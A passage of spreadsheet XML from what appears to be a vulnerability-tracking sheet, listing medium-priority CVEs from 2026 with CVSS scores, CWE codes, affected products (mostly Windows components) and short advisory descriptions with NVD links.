        </is>
      </c>
      <c r="M2224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t>
        </is>
      </c>
    </row>
    <row r="2225">
      <c r="A2225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="C2225" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2225" s="5" t="inlineStr"/>
      <c r="F2225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2225" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2225" s="5" t="inlineStr"/>
      <c r="I2225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2225" s="5" t="inlineStr"/>
      <c r="K2225" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="L2225" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="2226">
      <c r="A2226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70583</t>
        </is>
      </c>
      <c r="C2226" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2226" s="5" t="inlineStr"/>
      <c r="F2226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2226" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2226" s="5" t="inlineStr"/>
      <c r="I2226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2226" s="5" t="inlineStr"/>
      <c r="K2226" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2226" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t>
        </is>
      </c>
    </row>
    <row r="2227">
      <c r="A2227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70584</t>
        </is>
      </c>
      <c r="C2227" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2227" s="5" t="inlineStr"/>
      <c r="F2227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2227" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2227" s="5" t="inlineStr"/>
      <c r="I2227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2227" s="5" t="inlineStr"/>
      <c r="K2227" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2227" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t>
        </is>
      </c>
    </row>
    <row r="2228">
      <c r="A2228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="C2228" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2228" s="5" t="inlineStr"/>
      <c r="F2228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2228" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2228" s="5" t="inlineStr"/>
      <c r="I2228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2228" s="5" t="inlineStr"/>
      <c r="K2228" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2228" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="2229">
      <c r="A2229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="C2229" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2229" s="5" t="inlineStr"/>
      <c r="F2229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2229" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2229" s="5" t="inlineStr"/>
      <c r="I2229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2229" s="5" t="inlineStr"/>
      <c r="K2229" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="L2229" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="2230">
      <c r="A2230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="C2230" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2230" s="5" t="inlineStr"/>
      <c r="F2230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2230" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2230" s="5" t="inlineStr"/>
      <c r="I2230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2230" s="5" t="inlineStr"/>
      <c r="K2230" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2230" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="2231">
      <c r="A2231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71345</t>
        </is>
      </c>
      <c r="C2231" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2231" s="5" t="inlineStr"/>
      <c r="F2231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2231" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2231" s="5" t="inlineStr"/>
      <c r="I2231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2231" s="5" t="inlineStr"/>
      <c r="K2231" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2231" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t>
        </is>
      </c>
    </row>
    <row r="2232">
      <c r="A2232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71382</t>
        </is>
      </c>
      <c r="C2232" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2232" s="5" t="inlineStr"/>
      <c r="F2232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2232" s="5" t="inlineStr"/>
      <c r="H2232" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="I2232" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2232" s="5" t="inlineStr"/>
      <c r="K2232" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2232" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71382</t>
        </is>
      </c>
    </row>
    <row r="2233">
      <c r="A2233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71613</t>
        </is>
      </c>
      <c r="C2233" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2233" s="5" t="inlineStr"/>
      <c r="F2233" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2233" s="5" t="inlineStr"/>
      <c r="H2233" s="5" t="inlineStr"/>
      <c r="I2233" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2233" s="5" t="inlineStr"/>
      <c r="K2233" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2233" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the j2kdec_process() function. Fixed in 9a253a07fd3f6b48022bba74302bf39388dda859.</t>
        </is>
      </c>
      <c r="M2233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71613</t>
        </is>
      </c>
    </row>
    <row r="2234">
      <c r="A2234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72929</t>
        </is>
      </c>
      <c r="C2234" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2234" s="5" t="inlineStr"/>
      <c r="F2234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2234" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2234" s="5" t="inlineStr"/>
      <c r="I2234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2234" s="5" t="inlineStr"/>
      <c r="K2234" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="L2234" s="5" t="inlineStr">
        <is>
          <t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t>
        </is>
      </c>
    </row>
    <row r="2235">
      <c r="A2235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="C2235" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2235" s="5" t="inlineStr"/>
      <c r="F2235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2235" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2235" s="5" t="inlineStr"/>
      <c r="I2235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2235" s="5" t="inlineStr"/>
      <c r="K2235" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2235" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="2236">
      <c r="A2236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72944</t>
        </is>
      </c>
      <c r="C2236" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2236" s="5" t="inlineStr"/>
      <c r="F2236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2236" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2236" s="5" t="inlineStr"/>
      <c r="I2236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2236" s="5" t="inlineStr"/>
      <c r="K2236" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2236" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t>
        </is>
      </c>
    </row>
    <row r="2237">
      <c r="A2237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="C2237" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2237" s="5" t="inlineStr"/>
      <c r="F2237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2237" s="5" t="inlineStr"/>
      <c r="H2237" s="5" t="inlineStr"/>
      <c r="I2237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2237" s="5" t="inlineStr"/>
      <c r="K2237" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2237" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="2238">
      <c r="A2238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72953</t>
        </is>
      </c>
      <c r="C2238" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2238" s="5" t="inlineStr"/>
      <c r="F2238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2238" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2238" s="5" t="inlineStr"/>
      <c r="I2238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2238" s="5" t="inlineStr"/>
      <c r="K2238" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2238" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t>
        </is>
      </c>
    </row>
    <row r="2239">
      <c r="A2239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72957</t>
        </is>
      </c>
      <c r="C2239" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2239" s="5" t="inlineStr"/>
      <c r="F2239" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2239" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2239" s="5" t="inlineStr"/>
      <c r="I2239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2239" s="5" t="inlineStr"/>
      <c r="K2239" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2239" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t>
        </is>
      </c>
    </row>
    <row r="2240">
      <c r="A2240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72965</t>
        </is>
      </c>
      <c r="C2240" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2240" s="5" t="inlineStr"/>
      <c r="F2240" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2240" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2240" s="5" t="inlineStr"/>
      <c r="I2240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2240" s="5" t="inlineStr"/>
      <c r="K2240" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2240" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t>
        </is>
      </c>
    </row>
    <row r="2241">
      <c r="A2241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="C2241" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2241" s="5" t="inlineStr"/>
      <c r="F2241" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2241" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2241" s="5" t="inlineStr"/>
      <c r="I2241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2241" s="5" t="inlineStr"/>
      <c r="K2241" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2241" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="2242">
      <c r="A2242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="C2242" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2242" s="5" t="inlineStr"/>
      <c r="F2242" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2242" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2242" s="5" t="inlineStr"/>
      <c r="I2242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2242" s="5" t="inlineStr"/>
      <c r="K2242" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2242" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="2243">
      <c r="A2243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="C2243" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2243" s="5" t="inlineStr"/>
      <c r="F2243" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2243" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H224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43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2243" s="5" t="inlineStr"/>
      <c r="K2243" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2243" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="2244">
      <c r="A2244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="C2244" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2244" s="5" t="inlineStr"/>
      <c r="F2244" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2244" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2244" s="5" t="inlineStr"/>
      <c r="I2244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2244" s="5" t="inlineStr"/>
      <c r="K2244" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2244" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="2245">
      <c r="A2245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="C2245" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2245" s="5" t="inlineStr"/>
      <c r="F2245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2245" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2245" s="5" t="inlineStr"/>
      <c r="I2245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2245" s="5" t="inlineStr"/>
      <c r="K2245" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2245" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="2246">
      <c r="A2246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="C2246" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2246" s="5" t="inlineStr"/>
      <c r="F2246" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2246" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2246" s="5" t="inlineStr"/>
      <c r="I2246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2246" s="5" t="inlineStr"/>
      <c r="K2246" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2246" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="2247">
      <c r="A2247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="C2247" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2247" s="5" t="inlineStr"/>
      <c r="F2247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2247" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2247" s="5" t="inlineStr"/>
      <c r="I2247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2247" s="5" t="inlineStr"/>
      <c r="K2247" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2247" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="2248">
      <c r="A2248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="C2248" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2248" s="5" t="inlineStr"/>
      <c r="F2248" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2248" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H224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48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2248" s="5" t="inlineStr"/>
      <c r="K2248" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2248" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="2249">
      <c r="A2249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2249" s="5" t="inlineStr">
        <is>
